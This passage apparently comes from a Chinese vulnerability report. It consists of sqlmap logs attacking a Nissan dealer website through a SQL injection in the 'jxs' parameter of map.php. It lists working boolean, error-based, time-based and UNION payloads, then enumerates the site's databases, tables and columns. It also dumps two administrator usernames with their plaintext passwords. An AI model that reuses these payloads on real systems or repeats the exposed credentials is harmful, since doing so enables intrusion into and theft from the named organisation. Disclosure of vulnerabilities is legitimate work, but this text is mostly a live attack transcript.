| car_spec |
| car_speed |
| car_standard |
| car_structure |
| car_user |
| car_userfun |
| car_usergroup |
| car_view |
| category |
| department |
| displacement |
| downcategory |
| download |
| dqcategory |
| ecatalog |
| energy_config |
| energy_detail |
| energy_images |
| energy_memory |
| energy_notice |
| energy_parameter |
| energy_picture |
| energy_series |
| energy_seriesinfo |
| energy_video |
| energy_view |
| feedback |
| get_active |
| imagefile |
| imgcategory |
| jxs_getinfo |
| login_record |
| memory |
| mobilepicture |
| mx6_dealer |
| mx6_testdrive |
| mx6_user |
| picture |
| price |
| purecategory |
| puregoods |
| rencai |
| service |
| service_bak |
| sessions |
| survey |
| telents |
| topic |
| userfun |
| usergroup |
| view_Carprice |
| view_models |
| view_models_test |
| view_parameter |
| zhaopin |
+-------------------+
[23:01:07] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.zznissan.com.c

漏洞证明：

root@kailroot:~# sqlmap -u http://hbjzmh.zznissan.com.cn/map.php?jxs=541
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20151024}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 22:31:27
[22:31:28] [INFO] testing connection to the target URL
[22:31:28] [INFO] testing if the target URL is stable
[22:31:29] [INFO] target URL is stable
[22:31:29] [INFO] testing if GET parameter 'jxs' is dynamic
[22:31:29] [INFO] confirming that GET parameter 'jxs' is dynamic
[22:31:29] [INFO] GET parameter 'jxs' is dynamic
[22:31:30] [INFO] heuristic (basic) test shows that GET parameter 'jxs' might be injectable (possible DBMS: 'MySQL')
[22:31:30] [INFO] heuristic (XSS) test shows that GET parameter 'jxs' might be vulnerable to XSS attacks
[22:31:30] [INFO] testing for SQL injection on GET parameter 'jxs'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] 
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] 
[22:31:31] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:31:34] [WARNING] reflective value(s) found and filtering out
[22:31:35] [INFO] GET parameter 'jxs' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable 
[22:31:35] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[22:31:36] [INFO] GET parameter 'jxs' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable 
[22:31:36] [INFO] testing 'MySQL inline queries'
[22:31:36] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[22:31:36] [WARNING] time-based comparison requires larger statistical model, please wait............
[22:31:46] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[22:31:46] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT)'
[22:31:55] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:31:55] [WARNING] most probably web server instance hasn't recovered yet from previous timed based payload. If the problem persists please wait for few minutes and rerun without flag T in option '--technique' (e.g. '--flush-session --technique=BEUS') or try to lower the value of option '--time-sec' (e.g. '--time-sec=2')
[22:31:57] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[22:31:57] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[22:31:58] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[22:31:58] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[22:31:58] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[22:32:08] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:32:20] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SELECT)'
[22:32:25] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT - comment)'
[22:32:31] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SELECT - comment)'
[22:32:36] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[22:32:41] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind'
[22:32:54] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:33:05] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:33:16] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:33:27] [CRITICAL] unable to connect to the target URL or proxy
[22:33:37] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:33:48] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:33:59] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:34:10] [CRITICAL] unable to connect to the target URL or proxy
[22:34:10] [INFO] GET parameter 'jxs' seems to be 'MySQL >= 5.0.12 OR time-based blind' injectable 
[22:34:10] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[22:34:10] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[22:34:11] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[22:34:13] [INFO] target URL appears to have 17 columns in query
[22:34:15] [INFO] GET parameter 'jxs' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'jxs' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection point(s) with a total of 51 HTTP(s) requests:
---
Parameter: jxs (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: jxs=541' AND 5597=5597 AND 'Ywyd'='Ywyd
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: jxs=541' AND (SELECT 1956 FROM(SELECT COUNT(*),CONCAT(0x7171626271,(SELECT (ELT(1956=1956,1))),0x717a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Zede'='Zede
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: jxs=541' OR SLEEP(5) AND 'akqX'='akqX
    Type: UNION query
    Title: Generic UNION query (NULL) - 17 columns
    Payload: jxs=541' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171626271,0x6c5074756e4f507a6664,0x717a7a7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
---
[22:34:51] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[22:34:51] [INFO] fetched data logged to text files under '/root/.sqlmap/output/hbjzmh.zznissan.com.cn'
[*] shutting down at 22:34:51
root@kailroot:~# sqlmap -u http://hbjzmh.zznissan.com.cn/map.php?jxs=541 --dbs
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20151024}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 22:34:55
[22:34:55] [INFO] resuming back-end DBMS 'mysql' 
[22:34:55] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: jxs (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: jxs=541' AND 5597=5597 AND 'Ywyd'='Ywyd
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: jxs=541' AND (SELECT 1956 FROM(SELECT COUNT(*),CONCAT(0x7171626271,(SELECT (ELT(1956=1956,1))),0x717a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Zede'='Zede
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: jxs=541' OR SLEEP(5) AND 'akqX'='akqX
    Type: UNION query
    Title: Generic UNION query (NULL) - 17 columns
    Payload: jxs=541' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171626271,0x6c5074756e4f507a6664,0x717a7a7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
---
[22:34:56] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[22:34:56] [INFO] fetching database names
[22:34:56] [INFO] the SQL query used returns 41 entries
[22:34:56] [INFO] retrieved: information_schema
[22:34:57] [INFO] retrieved: club_15
[22:34:57] [INFO] retrieved: ebuy
[22:34:57] [INFO] retrieved: ebuy1217
[22:34:58] [INFO] retrieved: events
[22:34:58] [INFO] retrieved: events_2014cgr
[22:34:58] [INFO] retrieved: events_2014five
[22:34:58] [INFO] retrieved: events_pickupStory
[22:34:59] [INFO] retrieved: ezznissan
[22:34:59] [INFO] retrieved: innodb
[22:34:59] [INFO] retrieved: jinzhiwen
[22:35:00] [INFO] retrieved: maintain
[22:35:05] [INFO] retrieved: mysql
[22:35:05] [INFO] retrieved: nissan
[22:35:06] [INFO] retrieved: nissan_2015cgr
[22:35:06] [INFO] retrieved: nissan_jxs
[22:35:06] [INFO] retrieved: nissan_patrol
[22:35:06] [INFO] retrieved: nissanmedia
[22:35:07] [INFO] retrieved: nissantest
[22:35:07] [INFO] retrieved: paladin
[22:35:13] [INFO] retrieved: paladinclub
[22:35:13] [INFO] retrieved: paladinclubtemp
[22:35:18] [INFO] retrieved: palaqi
[22:35:19] [INFO] retrieved: performance_schema
[22:35:19] [INFO] retrieved: specialcar
[22:35:20] [INFO] retrieved: test
[22:35:20] [INFO] retrieved: topic
[22:35:25] [INFO] retrieved: tower_15
[22:35:26] [INFO] retrieved: wqw_five
[22:35:26] [INFO] retrieved: wqw_mx6gc
[22:35:26] [INFO] retrieved: wqw_succk
[22:35:27] [INFO] retrieved: xuhui
[22:35:27] [INFO] retrieved: yaguan
[22:35:28] [INFO] retrieved: zznissan
[22:35:28] [INFO] retrieved: zznissan_eng
[22:35:29] [INFO] retrieved: zznissan_jnds
[22:35:29] [INFO] retrieved: zznissan_lms2015
[22:35:29] [INFO] retrieved: zznissan_mx6sj2015
[22:35:29] [INFO] retrieved: zznissan_mx6tg2015
[22:35:30] [INFO] retrieved: zznissan_pro
[22:35:30] [INFO] retrieved: zznissanbak
available databases [41]:                                                      
[*] club_15
[*] ebuy
[*] ebuy1217
[*] events
[*] events_2014cgr
[*] events_2014five
[*] events_pickupStory
[*] ezznissan
[*] information_schema
[*] innodb
[*] jinzhiwen
[*] maintain
[*] mysql
[*] nissan
[*] nissan_2015cgr
[*] nissan_jxs
[*] nissan_patrol
[*] nissanmedia
[*] nissantest
[*] paladin
[*] paladinclub
[*] paladinclubtemp
[*] palaqi
[*] performance_schema
[*] specialcar
[*] test
[*] topic
[*] tower_15
[*] wqw_five
[*] wqw_mx6gc
[*] wqw_succk
[*] xuhui
[*] yaguan
[*] zznissan
[*] zznissan_eng
[*] zznissan_jnds
[*] zznissan_lms2015
[*] zznissan_mx6sj2015
[*] zznissan_mx6tg2015
[*] zznissan_pro
[*] zznissanbak
[22:35:30] [INFO] fetched data logged to text files under '/root/.sqlmap/output/hbjzmh.zznissan.com.cn'
[*] shutting down at 22:35:30
root@kailroot:~# sqlmap -u http://hbjzmh.zznissan.com.cn/map.php?jxs=541 --current-db
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20151024}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 22:38:53
[22:38:53] [INFO] resuming back-end DBMS 'mysql' 
[22:38:53] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: jxs (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: jxs=541' AND 5597=5597 AND 'Ywyd'='Ywyd
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: jxs=541' AND (SELECT 1956 FROM(SELECT COUNT(*),CONCAT(0x7171626271,(SELECT (ELT(1956=1956,1))),0x717a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Zede'='Zede
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: jxs=541' OR SLEEP(5) AND 'akqX'='akqX
    Type: UNION query
    Title: Generic UNION query (NULL) - 17 columns
    Payload: jxs=541' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171626271,0x6c5074756e4f507a6664,0x717a7a7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
---
[22:38:54] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[22:38:54] [INFO] fetching current database
current database:    'zznissan'
[22:38:54] [INFO] fetched data logged to text files under '/root/.sqlmap/output/hbjzmh.zznissan.com.cn'
[*] shutting down at 22:38:54
root@kailroot:~# sqlmap -u http://hbjzmh.zznissan.com.cn/map.php?jxs=541 --tables -D zznissan
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20151024}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 22:39:07
[22:39:07] [INFO] resuming back-end DBMS 'mysql' 
[22:39:07] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: jxs (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: jxs=541' AND 5597=5597 AND 'Ywyd'='Ywyd
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: jxs=541' AND (SELECT 1956 FROM(SELECT COUNT(*),CONCAT(0x7171626271,(SELECT (ELT(1956=1956,1))),0x717a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Zede'='Zede
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: jxs=541' OR SLEEP(5) AND 'akqX'='akqX
    Type: UNION query
    Title: Generic UNION query (NULL) - 17 columns
    Payload: jxs=541' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171626271,0x6c5074756e4f507a6664,0x717a7a7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
---
[22:39:08] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[22:39:08] [INFO] fetching tables for database: 'zznissan'
[22:39:09] [INFO] the SQL query used returns 78 entries
[22:39:09] [INFO] retrieved: Recruitment
[22:39:14] [INFO] retrieved: act_article
[22:39:15] [INFO] retrieved: act_category
[22:39:15] [INFO] retrieved: article
[22:39:15] [INFO] retrieved: article1029
[22:39:16] [INFO] retrieved: brandpicture
[22:39:21] [INFO] retrieved: car_adimg
[22:39:21] [INFO] retrieved: car_brand
[22:39:21] [INFO] retrieved: car_carimg
[22:39:22] [INFO] retrieved: car_config
[22:39:27] [INFO] retrieved: car_detail
[22:39:27] [INFO] retrieved: car_drive
[22:39:28] [INFO] retrieved: car_drivehouse
[22:39:28] [INFO] retrieved: car_getinfo
[22:39:28] [INFO] retrieved: car_leixing
[22:39:29] [INFO] retrieved: car_models
[22:39:34] [INFO] retrieved: car_modelsinfo
[22:39:34] [INFO] retrieved: car_norms
[22:39:34] [INFO] retrieved: car_parameter
[22:39:35] [INFO] retrieved: car_seat
[22:39:35] [INFO] retrieved: car_series
[22:39:35] [INFO] retrieved: car_seriesinfo
[22:39:35] [INFO] retrieved: car_spec
[22:39:36] [INFO] retrieved: car_speed
[22:39:36] [INFO] retrieved: car_standard
[22:39:36] [INFO] retrieved: car_structure
[22:39:37] [INFO] retrieved: car_user
[22:39:42] [INFO] retrieved: car_userfun
[22:39:43] [INFO] retrieved: car_usergroup
[22:39:43] [INFO] retrieved: car_view
[22:39:43] [INFO] retrieved: category
[22:39:44] [INFO] retrieved: department
[22:39:44] [INFO] retrieved: displacement
[22:39:44] [INFO] retrieved: downcategory
[22:39:45] [INFO] retrieved: download
[22:39:45] [INFO] retrieved: dqcategory
[22:39:45] [INFO] retrieved: ecatalog
[22:39:46] [INFO] retrieved: energy_config
[22:39:46] [INFO] retrieved: energy_detail
[22:39:46] [INFO] retrieved: energy_images
[22:39:47] [INFO] retrieved: energy_memory
[22:39:47] [INFO] retrieved: energy_notice
[22:39:47] [INFO] retrieved: energy_parameter
[22:39:48] [INFO] retrieved: energy_picture
[22:39:48] [INFO] retrieved: energy_series
[22:39:48] [INFO] retrieved: energy_seriesinfo
[22:39:49] [INFO] retrieved: energy_video
[22:39:49] [INFO] retrieved: energy_view
[22:39:49] [INFO] retrieved: feedback
[22:39:49] [INFO] retrieved: get_active
[22:39:50] [INFO] retrieved: imagefile
[22:39:50] [INFO] retrieved: imgcategory
[22:39:51] [INFO] retrieved: jxs_getinfo
[22:39:51] [INFO] retrieved: login_record
[22:39:52] [INFO] retrieved: memory
[22:39:52] [INFO] retrieved: mobilepicture
[22:39:52] [INFO] retrieved: mx6_dealer
[22:39:53] [INFO] retrieved: mx6_testdrive
[22:39:53] [INFO] retrieved: mx6_user
[22:39:53] [INFO] retrieved: picture
[22:39:53] [INFO] retrieved: price
[22:39:54] [INFO] retrieved: purecategory
[22:39:54] [INFO] retrieved: puregoods
[22:40:00] [INFO] retrieved: rencai
[22:40:00] [INFO] retrieved: service
[22:40:00] [INFO] retrieved: service_bak
[22:40:01] [INFO] retrieved: sessions
[22:40:01] [INFO] retrieved: survey
[22:40:02] [INFO] retrieved: telents
[22:40:02] [INFO] retrieved: topic
[22:40:02] [INFO] retrieved: user
[22:40:03] [INFO] retrieved: userfun
[22:40:03] [INFO] retrieved: usergroup
[22:40:03] [INFO] retrieved: view_Carprice
[22:40:03] [INFO] retrieved: view_models
[22:40:04] [INFO] retrieved: view_models_test
[22:40:04] [INFO] retrieved: view_parameter
[22:40:04] [INFO] retrieved: zhaopin
Database: zznissan                                                             
[78 tables]
+-------------------+
| Recruitment       |
| user              |
| act_article       |
| act_category      |
| article           |
| article1029       |
| brandpicture      |
| car_adimg         |
| car_brand         |
| car_carimg        |
| car_config        |
| car_detail        |
| car_drive         |
| car_drivehouse    |
| car_getinfo       |
| car_leixing       |
| car_models        |
| car_modelsinfo    |
| car_norms         |
| car_parameter     |
| car_seat          |
| car_series        |
| car_seriesinfo    |
| car_spec          |
| car_speed         |
| car_standard      |
| car_structure     |
| car_user          |
| car_userfun       |
| car_usergroup     |
| car_view          |
| category          |
| department        |
| displacement      |
| downcategory      |
| download          |
| dqcategory        |
| ecatalog          |
| energy_config     |
| energy_detail     |
| energy_images     |
| energy_memory     |
| energy_notice     |
| energy_parameter  |
| energy_picture    |
| energy_series     |
| energy_seriesinfo |
| energy_video      |
| energy_view       |
| feedback          |
| get_active        |
| imagefile         |
| imgcategory       |
| jxs_getinfo       |
| login_record      |
| memory            |
| mobilepicture     |
| mx6_dealer        |
| mx6_testdrive     |
| mx6_user          |
| picture           |
| price             |
| purecategory      |
| puregoods         |
| rencai            |
| service           |
| service_bak       |
| sessions          |
| survey            |
| telents           |
| topic             |
| userfun           |
| usergroup         |
| view_Carprice     |
| view_models       |
| view_models_test  |
| view_parameter    |
| zhaopin           |
+-------------------+
[22:40:04] [INFO] fetched data logged to text files under '/root/.sqlmap/output/hbjzmh.zznissan.com.cn'
[*] shutting down at 22:40:04
root@kailroot:~# sqlmap -u http://hbjzmh.zznissan.com.cn/map.php?jxs=541 --columns -T user -D zznissan
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20151024}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 22:40:59
[22:40:59] [INFO] resuming back-end DBMS 'mysql' 
[22:40:59] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: jxs (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: jxs=541' AND 5597=5597 AND 'Ywyd'='Ywyd
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: jxs=541' AND (SELECT 1956 FROM(SELECT COUNT(*),CONCAT(0x7171626271,(SELECT (ELT(1956=1956,1))),0x717a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Zede'='Zede
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: jxs=541' OR SLEEP(5) AND 'akqX'='akqX
    Type: UNION query
    Title: Generic UNION query (NULL) - 17 columns
    Payload: jxs=541' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171626271,0x6c5074756e4f507a6664,0x717a7a7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
---
[22:41:00] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[22:41:00] [INFO] fetching columns for table 'user' in database 'zznissan'
[22:41:01] [INFO] the SQL query used returns 19 entries
[22:41:01] [INFO] retrieved: "id","tinyint(5)"
[22:41:01] [INFO] retrieved: "username","varchar(20)"
[22:41:02] [INFO] retrieved: "password","varchar(32)"
[22:41:02] [INFO] retrieved: "groupid","tinyint(2)"
[22:41:03] [INFO] retrieved: "depid","tinyint(2)"
[22:41:03] [INFO] retrieved: "userEmail","varchar(50)"
[22:41:03] [INFO] retrieved: "addCount","int(10) unsigned"
[22:41:04] [INFO] retrieved: "ip","varchar(255)"
[22:41:04] [INFO] retrieved: "addtime","datetime"
[22:41:04] [INFO] retrieved: "operator_id","int(11)"
[22:41:04] [INFO] retrieved: "user_dep_id","int(11)"
[22:41:04] [INFO] retrieved: "user_dep_name","varchar(255)"
[22:41:05] [INFO] retrieved: "user_deprights","text"
[22:41:06] [INFO] retrieved: "realname","varchar(255)"
[22:41:06] [INFO] retrieved: "keyno","varchar(25)"
[22:41:06] [INFO] retrieved: "keypin","varchar(255)"
[22:41:07] [INFO] retrieved: "usekey","tinyint(1)"
[22:41:07] [INFO] retrieved: "jxs_uid","int(11)"
[22:41:07] [INFO] retrieved: "area_id","int(11)"
Database: zznissan                                                             
Table: user
[19 columns]
+----------------+------------------+
| Column         | Type             |
+----------------+------------------+
| addCount       | int(10) unsigned |
| addtime        | datetime         |
| area_id        | int(11)          |
| depid          | tinyint(2)       |
| groupid        | tinyint(2)       |
| id             | tinyint(5)       |
| ip             | varchar(255)     |
| jxs_uid        | int(11)          |
| keyno          | varchar(25)      |
| keypin         | varchar(255)     |
| operator_id    | int(11)          |
| password       | varchar(32)      |
| realname       | varchar(255)     |
| usekey         | tinyint(1)       |
| user_dep_id    | int(11)          |
| user_dep_name  | varchar(255)     |
| user_deprights | text             |
| userEmail      | varchar(50)      |
| username       | varchar(20)      |
+----------------+------------------+
[22:41:07] [INFO] fetched data logged to text files under '/root/.sqlmap/output/hbjzmh.zznissan.com.cn'
[*] shutting down at 22:41:07
root@kailroot:~# sqlmap -u http://hbjzmh.zznissan.com.cn/map.php?jxs=541 --dump -T user -C "username,password" -D zznissan
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20151024}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 22:42:16
[22:42:16] [INFO] resuming back-end DBMS 'mysql' 
[22:42:16] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: jxs (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: jxs=541' AND 5597=5597 AND 'Ywyd'='Ywyd
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: jxs=541' AND (SELECT 1956 FROM(SELECT COUNT(*),CONCAT(0x7171626271,(SELECT (ELT(1956=1956,1))),0x717a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Zede'='Zede
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: jxs=541' OR SLEEP(5) AND 'akqX'='akqX
    Type: UNION query
    Title: Generic UNION query (NULL) - 17 columns
    Payload: jxs=541' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171626271,0x6c5074756e4f507a6664,0x717a7a7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
---
[22:42:22] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[22:42:22] [INFO] fetching columns 'password, username' for table 'user' in database 'zznissan'
[22:42:22] [INFO] the SQL query used returns 2 entries
[22:42:22] [INFO] retrieved: "username","varchar(20)"
[22:42:23] [INFO] retrieved: "password","varchar(32)"
[22:42:23] [INFO] fetching entries of column(s) 'password, username' for table 'user' in database 'zznissan'
[22:42:23] [INFO] the SQL query used returns 2 entries
[22:42:28] [INFO] retrieved: "nissan2014!@#","super"
[22:42:34] [INFO] retrieved: "zznissan2015!@#$%^","admin"
[22:42:34] [INFO] analyzing table dump for possible password hashes            
Database: zznissan
Table: user
[2 entries]
+----------+--------------------+
| username | password           |
+----------+--------------------+
| super    | nissan2014!@#      |
| admin    | zznissan2015!@#$%^ |
+----------+--------------------+
[22:42:34] [WARNING] table 'zznissan.`user`' dumped to CSV file '/root/.sqlmap/output/hbjzmh.zznissan.com.cn/dump/zznissan/user-f3649c95.csv'
[22:42:34] [INFO] fetched data logged to text files under '/root/.sqlmap/output/hbjzmh.zznissan.com.cn'
[*] shutting down at 22:42:34
root@kailroot:~# sqlmap -u http://hbjzmh.zznissan.com.cn/map.php?jxs=541 --columns -T car_user -D zznissan
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20151024}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 22:43:17
[22:43:17] [INFO] resuming back-end DBMS 'mysql' 
[22:43:17] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: jxs (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: jxs=541' AND 5597=5597 AND 'Ywyd'='Ywyd
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: jxs=541' AND (SELECT 1956 FROM(SELECT COUNT(*),CONCAT(0x7171626271,(SELECT (ELT(1956=1956,1))),0x717a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Zede'='Zede
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: jxs=541' OR SLEEP(5) AND 'akqX'='akqX
    Type: UNION query
    Title: Generic UNION query (NULL) - 17 columns
    Payload: jxs=541' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171626271,0x6c5074756e4f507a6664,0x717a7a7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
---
[22:43:19] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[22:43:19] [INFO] fetching columns for table 'car_user' in database 'zznissan'
[22:43:20] [INFO] the SQL query used returns 19 entries
[22:43:21] [INFO] retrieved: "id","tinyint(5)"
[22:43:21] [INFO] retrieved: "username","varchar(20)"
[22:43:21] [INFO] retrieved: "password","varchar(32)"
[22:43:22] [INFO] retrieved: "groupid","tinyint(2)"
[22:43:22] [INFO] retrieved: "depid","tinyint(2)"
[22:43:27] [INFO] retrieved: "userEmail","varchar(50)"
[22:43:27] [INFO] retrieved: "addCount","int(10) unsigned"
[22:43:28] [INFO] retrieved: "ip","varchar(255)"
[22:43:28] [INFO] retrieved: "addtime","datetime"
[22:43:29] [INFO] retrieved: "operator_id","int(11)"
[22:43:29] [INFO] retrieved: "user_dep_id","int(11)"
[22:43:29] [INFO] retrieved: "user_dep_name","varchar(255)"
[22:43:30] [INFO] retrieved: "user_deprights","text"
